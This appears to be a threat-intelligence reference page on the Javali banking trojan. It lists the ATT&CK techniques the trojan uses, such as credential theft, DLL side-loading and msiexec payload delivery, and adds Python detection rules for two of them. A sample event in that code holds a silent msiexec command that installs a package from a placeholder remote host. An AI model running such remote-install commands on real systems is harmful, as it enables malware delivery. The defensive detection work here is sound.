S0528 Javali

Javali is a banking trojan that has targeted Portuguese- and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[1]

Item             | Value
-----------------|-----------------
ID               | S0528
Associated Names |
Version          | 1.0
Created          | 09 November 2020
Last Modified    | 22 December 2020
Techniques Used

Domain     | ID        | Name                               | Use
-----------|-----------|------------------------------------|----------------------------------------------------------------
Enterprise | T1059     | Command and Scripting Interpreter  | -
Enterprise | T1059.005 | Visual Basic                       | Javali has used embedded VBScript to download malicious payloads from C2.[1]
Enterprise | T1555     | Credentials from Password Stores   | -
Enterprise | T1555.003 | Credentials from Web Browsers      | Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.[1]
Enterprise | T1574     | Hijack Execution Flow              | -
Enterprise | T1574.002 | DLL Side-Loading                   | Javali can use DLL side-loading to load malicious DLLs into legitimate executables.[1]
Enterprise | T1105     | Ingress Tool Transfer              | Javali can download payloads from remote C2 servers.[1]
Enterprise | T1027     | Obfuscated Files or Information    | -
Enterprise | T1027.001 | Binary Padding                     | Javali can use large obfuscated libraries to hinder detection and analysis.[1]
Enterprise | T1566     | Phishing                           | -
Enterprise | T1566.001 | Spearphishing Attachment           | Javali has been delivered as malicious e-mail attachments.[1]
Enterprise | T1566.002 | Spearphishing Link                 | Javali has been delivered via malicious links embedded in e-mails.[1]
Enterprise | T1057     | Process Discovery                  | Javali can monitor processes for open browsers and custom banking applications.[1]
Enterprise | T1218     | System Binary Proxy Execution      | -
Enterprise | T1218.007 | Msiexec                            | Javali has used the MSI installer to download and execute malicious payloads.[1]
Enterprise | T1204     | User Execution                     | -
Enterprise | T1204.001 | Malicious Link                     | Javali has achieved execution through victims clicking links to malicious websites.[1]
Enterprise | T1204.002 | Malicious File                     | Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.[1]
Enterprise | T1102     | Web Service                        | -
Enterprise | T1102.001 | Dead Drop Resolver                 | Javali can read C2 information from Google Documents and YouTube.[1]
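Two of the techniques in the table above, Msiexec (T1218.007) fetching a package from a remote URL and DLL Side-Loading (T1574.002) into a legitimate executable, leave traces in ordinary endpoint telemetry. The following is an added example of triage logic for those two behaviours; it is not part of the ATT&CK page or of any published Javali analysis. The event field names (`event`, `image`, `command_line`, `module`, `image_signed`, `module_signed`) are assumptions loosely modelled on Sysmon process-creation and image-load events, the sample events are constructed, and the host `example.invalid` and file names in them are placeholders, not Javali indicators.

```python
"""Added example: endpoint triage rules for T1218.007 and T1574.002.

The event schema and the sample events below are constructed for this
example; map the field names onto your own telemetry before use.
"""
import ntpath  # handles Windows paths regardless of the host OS
import re

# Any http(s) URL in a command line.
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)

# Directories a standard user can normally write to (assumption: extend for your estate).
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|[a-z]:\\programdata"
    r"|[a-z]:\\windows\\temp)\\",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry): two process creations, two image loads.
EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /q /i https://example.invalid/update.msi"},
    {"event": "process_create",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\alice\Downloads\reader-setup.msi"},
    {"event": "image_load",
     "image": r"C:\Users\alice\AppData\Local\Temp\viewer\viewer.exe", "image_signed": True,
     "module": r"C:\Users\alice\AppData\Local\Temp\viewer\helper.dll", "module_signed": False},
    {"event": "image_load",
     "image": r"C:\Program Files\Vendor\viewer.exe", "image_signed": True,
     "module": r"C:\Windows\System32\kernel32.dll", "module_signed": True},
]


def msiexec_remote_install(ev):
    """T1218.007: msiexec.exe given a remote URL as the package source.

    A local MSI path is deliberately not flagged; it is common and noisy.
    """
    if ev.get("event") != "process_create":
        return None
    if not ev.get("image", "").lower().endswith("\\msiexec.exe"):
        return None
    match = REMOTE_URL.search(ev.get("command_line", ""))
    if not match:
        return None
    return f"T1218.007 msiexec fetching package from {match.group(0)}"


def sideloaded_unsigned_dll(ev):
    """T1574.002: a signed executable loading an unsigned DLL that sits beside it
    in a user-writable directory, the classic side-loading layout."""
    if ev.get("event") != "image_load":
        return None
    if not ev.get("image_signed") or ev.get("module_signed"):
        return None
    module = ev.get("module", "")
    if not module.lower().endswith(".dll"):
        return None
    same_dir = ntpath.dirname(module).lower() == ntpath.dirname(ev.get("image", "")).lower()
    if not (same_dir and USER_WRITABLE.match(module)):
        return None
    return f"T1574.002 signed {ntpath.basename(ev['image'])} loaded unsigned {module}"


RULES = (msiexec_remote_install, sideloaded_unsigned_dll)


def triage(events):
    """Run every rule over every event and return the list of findings."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The side-loading rule relies on code-signing state being present in the image-load event; where your sensor does not record it, substitute a check of the module against a baseline of known-good hashes for that executable's directory. Both rules are starting points for hunting rather than high-fidelity alerts, since legitimate installers also fetch MSI packages over HTTPS.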